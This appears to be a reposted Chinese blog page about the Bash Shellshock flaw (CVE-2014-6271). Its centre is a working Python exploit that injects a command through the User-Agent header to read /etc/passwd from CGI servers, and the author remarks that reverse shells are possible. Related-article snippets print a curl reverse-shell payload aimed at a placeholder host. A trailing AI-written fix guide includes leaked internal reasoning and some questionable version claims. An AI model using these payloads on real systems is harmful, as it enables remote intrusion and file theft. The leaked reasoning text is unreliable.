Bash远程命令执行漏洞(CVE-2014-6271)分析利用

Bash远程命令执行漏洞
最新推荐文章于 2025-07-16 09:00:00 发布
转载 最新推荐文章于 2025-07-16 09:00:00 发布 · 569 阅读 · 1 ·
CC 4.0 BY-SA版权
原文链接:https://yq.aliyun.com/articles/130067
文章标签:

#python #shell

本文介绍了一个在Bash中发现的远程命令执行漏洞(CVE-2014-6271)。作者分享了一个Python脚本,用于测试目标系统是否受此漏洞影响,并演示了如何利用该漏洞读取/etc/passwd文件。
这几天Bash被爆存在远程命令执行漏洞(CVE-2014-6271),昨天参加完isc,晚上回家 测试了一下,写了个python版本的测试小基本,贴上代码:
#coding:utf-8
import urllib,httplib
import sys,re,urlparse
#author:nx4dm1n
#website:http://www.nxadmin.com
def bash_exp(url):
urlsp=urlparse.urlparse(url)
hostname=urlsp.netloc
urlpath=urlsp.path
conn=httplib.HTTPConnection(hostname)
headers={"User-Agent":"() { :;}; echo `/bin/cat /etc/passwd`"}
conn.request("GET",urlpath,headers=headers)
res=conn.getresponse()
res=res.getheaders()
for passwdstr in res:
print passwdstr[0]+':'+passwdstr[1]
if __name__=='__main__':
#带http
if len(sys.argv)<2:
print "Usage: "+sys.argv[0]+" http://www.nxadmin.com/cgi-bin/index.cgi"
sys.exit()
else:
bash_exp(sys.argv[1])
  脚本执行效果如图所示:
  bash命令执行
  也可以用burp进行测试。
  利用该漏洞其实可以做很多事情,写的python小脚本只是执行了cat /etc/passwd。可以执行反向链接的命令等,直接获取一个 shell还是有可能的。不过漏洞存在的条件也比较苛刻,测试找了一些,发现了很少几个存在漏洞

最新内容请见作者的GitHub页:http://qaseven.github.io/
CVE-2014-6271 “破壳“ 漏洞(cgi-bin)
墨痕诉清风的博客
07-19 2997
CVE-2014-6271(即“破壳”漏洞)广泛存在与GNUBash版本小于等于4.3的*inux的系统之中,只要目标服务器开放着与Bash相交互的应用与服务,就有可能成功触发漏洞,获取目标系统当前Bash运行用户相同权限的shell接口。该漏洞利用条件较多,1.bash版本小于等于4.3,2.攻击者可以控制环境变量,3.新的bash进程被打开触发漏洞并执行命令。简单点说,没有cgi脚本继承环境变量,就玩不了;有cgi脚本的,bash版本过高也玩不了。catecho;do";};......
浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224
初岄的博客
07-26 1604
浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224
CVE-2014-6271“破壳”漏洞利用过程
D-river博客
11-12 9421
前言CVE-2014-6271(即“破壳”漏洞)广泛存在与GNU Bash 版本小于等于4.3的*inux的系统之中,只要目标服务器开放着与Bash相交互的应用与服务,就有可能成功触发漏洞,获取目标系统当前Bash运行用户相同权限的shell接口。实验环境攻击机:kali linux 目标机: Ubuntu ip: 10.10.10.129漏洞验证 Bash版本小于等于4.3可能存在漏洞
漏洞复现——bash远程解析命令执行漏洞
weixin_30314793的博客
11-23 601
漏洞描述:Bash脚本在解析某些特殊字符串时出现逻辑错误导致可以执行后面的命令,在一些cgi脚本中,数据是通过环境变量来传递的,这样就会形成该漏洞 漏洞原理:bash通过以函数名作为环境变量名,以“(){”(bash只有在遇到特殊的环境变量才会触发该漏洞)开头的字串作为环境变量的值来将函数定义导出为环境变量。而该漏洞就在于BASH处理这样的“函数环境变量”的时候,并没有以函数结尾“}”...
Bash Shellshock(破壳CVE-2014-6271
m0_62908421的博客
07-16 651
Shellshock漏洞分析利用》摘要 Shellshock(CVE-2014-6271)是2014年曝光的Bash高危漏洞(CVSS 10.0),影响全球数亿Linux/Unix设备。其核心在于Bash解析环境变量时对函数定义的边界验证缺陷,允许通过构造恶意变量(如VAR=(){:;};恶意命令)注入任意代码。该漏洞可通过HTTP请求、SSH等媒介远程利用,导致蠕虫传播、数据泄露等危害。修复方案包括升级Bash至4.3-013以上版本,或通过禁用函数导出、Web过滤等措施缓解。
Shellshock (bash之门)远程代码执行漏洞
Blanks的博客
12-25 1127
最近在打靶的时候才了解到这一个**漏洞**,其针对一些靶机**版本比较老**的机器特别好用,毕竟是一个Shell的**远程代码执行**,如果能直接反弹Shell就省去了更多的时间。
Bash Bug(破壳漏洞Shellshock) - CVE-2014-6271
HaSaKing的博客
05-28 1225
破壳漏洞是对全球数以百万计的系统构成威胁的严重安全漏洞。通过理解其原理并学习如何检测和修补,您可以显著提高自己系统的安全性。始终保持系统和软件的最新状态是保护自己免受此类漏洞攻击的关键策略。
Bash 远程任意代码执行安全漏洞(最严重漏洞
weixin_34301132的博客
09-25 540
Bash 远程任意代码执行安全漏洞(最严重漏洞)如下命令来检查系统存在此漏洞:#envx='(){:;};echovulnerable'bash-c"echothisisatest" vulnerable thisisatest修复后结果#envx='(){:;};echovulnerable'bash-c"echoth...
Nexus 远程命令执行漏洞 CVE-2020-10199复现
qq_62056583的博客
07-12 2733
nexus 远程代码执行 (CVE-2020-10199)漏洞是一个基于maven的仓库管理器,漏洞主要是不安全的执行了EL表达式导致的,根据网上的内容也就明白了为什么对于memberNames中的值进行修改和插入payload的操作了,这跟CVE-2019-7238漏洞原理也有异曲同工之处,同样是通过对于一些定义的函数不加以检查然后导致出现漏洞被用来注入执行远程代码。
破壳漏洞(CVE-2014-6271)综合分析1
08-04
【破壳漏洞(CVE-2014-6271)综合分析】 一、威胁卡片 破壳漏洞,也称为Bash Shellshock,是由法国的安全研究员Stéphane Chazelas在2014年9月中旬发现的。这个漏洞被赋予了CVE编号CVE-2014-6271,属于A级威胁响应...
linux 带环境变量 远程执行,GNU Bash 环境变量远程命令执行漏洞(CVE-2014-6271)
weixin_35437039的博客
05-08 617
发布日期:2014-09-24更新日期:2014-09-25受影响系统:GNU Bash <= 4.3描述:BUGTRAQ ID: 70103CVE(CAN) ID: CVE-2014-6271GNU Bash(Bourne again shell)是一个为GNU计划编写的Unix shell,广泛使用在Linux系统内,最初的功能仅是一个简单的基于终端的命令解释器。GNU Bash 4....
BASH BUG:cve-2014-6271验证与利用
Linuxer's Blog Data
04-18 1581
来源:Mickey@360网络攻防实验室 Stephane Schazelas最近发现BASH的一个BUG,问题在于BASH在处理环境变量的时候,这个漏洞影响bash版本1.14 - 4.3, 受影响的发行版本包括:     Red Hat Enterprise Linux (versions 4 through 7) and the Fedora distribution     C
Bash远程解析命令执行漏洞测试方法
零度危险个人博客
04-06 1622
Bash漏洞为什么能够执行 Bash漏洞的原理: BASH除了可以将shell变量导出为环境变量,还可以将shell函数导出为环境变量!当前版本的bash通过以函数名作为环境变量名,以“(){”开头的字串作为环境变量的值来将函数定义导出为环境变量。 此次爆出的漏洞在于BASH处理这样的“函数环境变量”的时候,并没有以函数结尾“}”为结束,而是一直执行其后的shell命令。 简单地
Shellshock远程命令注入 CVE-2014-6271 漏洞复现
ADummy的博客
03-04 1219
Shellshock远程命令注入(CVE-2014-6271) by ADummy 0x00利用路线 ​ Burpsuite发包—>命令执行 0x01漏洞介绍 ​ CVE-2014-6271(即“破壳”漏洞)广泛存在与GNU Bash 版本小于等于4.3的*inux的系统之中,只要目标服务器开放着与Bash相交互的应用与服务,就有可能成功触发漏洞,获取目标系统当前Bash运行用户相同权限的shell接口 0x 02漏洞复现 当您访问时,http://your-ip/您应该看到两个文件: saf
Shellshock 破壳漏洞CVE-2014-6271
EC_Carrot的博客
07-29 576
漏洞简介 GNU Bash 4.3及之前版本中存在安全漏洞,该漏洞源于程序没有正确处理环境变量值内的函数定义。远程攻击者可借助特制的环境变量利用漏洞执行任意代码。 漏洞复现 将payload附在User-Agent中访问victim.cgi,即可执行命令: User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id ...
php cve-2014-9427漏洞,GNU Bash环境变量远程任意代码执行漏洞CVE-2014-6271
weixin_29255731的博客
04-02 906
ps:利用payloadcurl http://xxx.xxx.xxx.xxx/cgi-bin/vulnerable -A "() { :;}; /bin/sh -i >& /dev/tcp/REVERSE_SHELL_IP/PORT 0>&1"发布日期:2014-09-25CVE ID:CVE-2014-6271受影响的软件及系统:==================...
linux漏洞 远程,Bash 远程任意代码执行安全漏洞(最严重漏洞
weixin_39611047的博客
05-06 338
US-CERT 意识到 Bash 存在一个安全的漏洞,该漏洞直接影响基于 Unix 的系统(如 Linux、OS X 等)。该漏洞将导致远程攻击者在受影响的系统上执行任意代码。US-CERT 建议用户和管理员重新检查这篇红帽的安全博客。更多的详情只能参考相应 Linux 发行商以获取相应补丁。你可以使用如下命令来检查系统存在此漏洞:env x='() { :;}; echo vulnerable'...
CVE-2014-6271-bash shellshock-破壳漏洞复现
m0_62008601的博客
08-06 3493
这些变量可以包含代码,在shell被调用后会被立即执行。用docker搭建vulhub漏洞靶场,服务启动后,有两个页面http://192.168.217.134:8080/victim.cgi和http://192.168.217.134:8080/safe.cgi。可以看到错误原因都是permission denied,那就是权限不足的原因了,那我们就修改一下权限,让它能够被访问。既然在victim.cgi可以执行命令,那么应该就可以进行反弹shell了,kali开启端口监听,执行反弹shell命令。.
禁止存在bash安全漏洞CVE-2014-6271
最新发布
07-24
<think>首先,用户的问题是关于修复Bash安全漏洞CVE-2014-6271的。我需要基于提供的引用内容来回答,并确保回答结构清晰、可靠。 关键引用内容: - 引用[1]:讨论了破壳漏洞的原理,影响范围是Unix和类Unix系统的Bash- 引用[2]:提到了2016年修复该漏洞的经历,包括升级设备、通知客户等。 - 引用[3]:描述了漏洞的复现方法,影响范围是GNU Bash 4.3及之前版本。 - 引用[4]:同样提到漏洞复现,并指出它允许执行任意命令。 - 引用[5]:给出了一个具体的利用示例,如User-Agent中的命令注入。 用户的问题焦点是“修复方法”,所以我需要总结如何修复这个漏洞。 修复方法的核心: - 从引用中,修复通常涉及升级Bash到安全版本。漏洞Bash 4.3及之前版本存在,所以升级到4.4或更高版本是关键。 - 引用[2]提到他们修复了问题并出了设备升级包,通知客户升级。 - 其他引用强调漏洞的原理是环境变量中的代码执行,因此修复是通过补丁来防止这种执行。 标准修复步骤: 1. 检查当前Bash版本:使用命令如 `bash --version` 查看版本。 2. 升级Bash:通过系统包管理器升级到安全版本。 - 对于基于Debian的系统:`sudo apt-get update && sudo apt-get install --only-upgrade bash` - 对于基于RHEL的系统:`sudo yum update bash` 3. 应用补丁:如果无法立即升级,应用官方补丁。 4. 测试修复:使用已知的测试命令来验证漏洞是否已修复,如 `env x='() { :;}; echo vulnerable' bash -c "echo this is a test"`。如果输出不包含"vulnerable",则修复成功。 5. 其他措施:确保所有系统组件都更新,特别是那些可能暴露Bash的服务。 回答结构: - 由于是系统级指令,我需要使用中文。 - 行内数学表达式用$...$,但这里可能不涉及数学公式。用户的问题是关于漏洞修复,不太可能有数学表达式,所以我会避免不必要的LaTeX。 - 独立公式用$$...$$,但同样,可能不需要。 - 回答中引用的段落末尾自然地添加引用标识,如 [^1]。 - 生成相关问题:在回答结束后,添加一个“相关问题”部分。 回答内容: 1. 介绍漏洞:简要说明CVE-2014-6271是什么。 2. 解释修复方法:逐步说明如何修复。 3. 引用来源:在适当的地方添加引用标识。 4. 确保真实可靠:基于提供的引用。 相关问题生成: - 基于主题,生成2-3个相关问题,如: - 如何测试系统是否受到CVE-2014-6271的影响? - 除了升级,还有哪些缓解措施? - 这个漏洞的长期影响是什么? 完整回答结构: - 开头:介绍漏洞- 主体:修复步骤。 - 结尾:相关问题。</think>### Bash 安全漏洞 CVE-2014-6271 修复方法 CVE-2014-6271(也称为“破壳漏洞”或“Shellshock”)是一个影响GNU Bash的安全漏洞,主要存在于Bash 4.3及更早版本中。该漏洞允许攻击者通过恶意环境变量执行任意命令,从而可能获取系统未授权访问权限[^3][^4]。修复此漏洞的关键是升级Bash到安全版本或应用官方补丁。以下修复方法基于行业最佳实践和引用内容,我将逐步说明操作步骤,确保过程清晰可靠。 #### 修复步骤 1. **检查当前Bash版本** 首先,确认您的系统是否受影响。在终端运行以下命令检查Bash版本: ```bash bash --version ``` 如果输出显示版本为4.3或更早(例如 `GNU bash, version 4.2.45(1)-release`),则系统存在漏洞[^3]。需要立即升级。 2. **升级Bash到安全版本** 升级是修复漏洞的最有效方法。安全版本包括Bash 4.4或更高。根据您的操作系统类型,使用包管理器执行升级: - **Debian/Ubuntu系统**: ```bash sudo apt-get update && sudo apt-get install --only-upgrade bash ``` - **RHEL/CentOS系统**: ```bash sudo yum update bash ``` 升级后,重启系统或重新加载相关服务(如Web服务器),以确保新版本生效[^2][^4]。 3. **应用官方补丁(如果无法立即升级)** 如果升级不可行(例如在生产环境中),可手动应用补丁: - 从官方GNU Bash仓库下载补丁文件(如CVE-2014-6271的补丁)。 - 编译并安装补丁: ```bash # 示例步骤(以源码编译为例) wget https://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-027 patch -p0 < bash43-027 ./configure && make && sudo make install ``` 补丁会修复环境变量解析的缺陷,防止恶意代码执行[^1][^3]。 4. **验证修复是否成功** 升级或打补丁后,测试漏洞是否已修复。运行以下命令: ```bash env x='() { :;}; echo vulnerable' bash -c "echo test" ``` - 如果输出显示 `vulnerable`,则漏洞仍存在,需重新检查升级步骤。 - 如果仅输出 `test`,则漏洞已修复[^3][^5]。 5. **其他安全措施** - **扫描和监控**:使用漏洞扫描工具(如Nessus或OpenVAS)定期检查系统,确保无残留风险。引用[2]中提到,在修复后应及时更新扫描规则以检测此漏洞[^2]。 - **服务隔离**:限制可能暴露Bash的服务(如CGI脚本或SSH),避免环境变量被外部控制[^4]。 - **更新依赖组件**:确保所有使用Bash的应用程序(如Web服务器或网络设备)也升级到安全版本,防止间接利用[^1][^2]。 #### 注意事项 - **影响范围**:此漏洞主要影响Unix和类Unix系统(如Linux、macOS)。如果您的系统涉及网络服务(如Apache CGI),攻击者可能通过HTTP请求头(如User-Agent)注入恶意代码[^4][^5]。 - **风险级别**:CVE-2014-6271被评定为高危漏洞,因为它允许远程代码执行。及时修复可避免类似“心脏流血”(Heartbleed)事件的大规模安全事件[^2]。 - **最佳实践**:建议订阅安全公告(如CVE数据库),并在漏洞披露后72小时内完成修复,以最小化攻击窗口。 通过以上步骤,您可以有效修复CVE-2014-6271。如果操作中遇到问题,可参考官方文档或社区支持资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值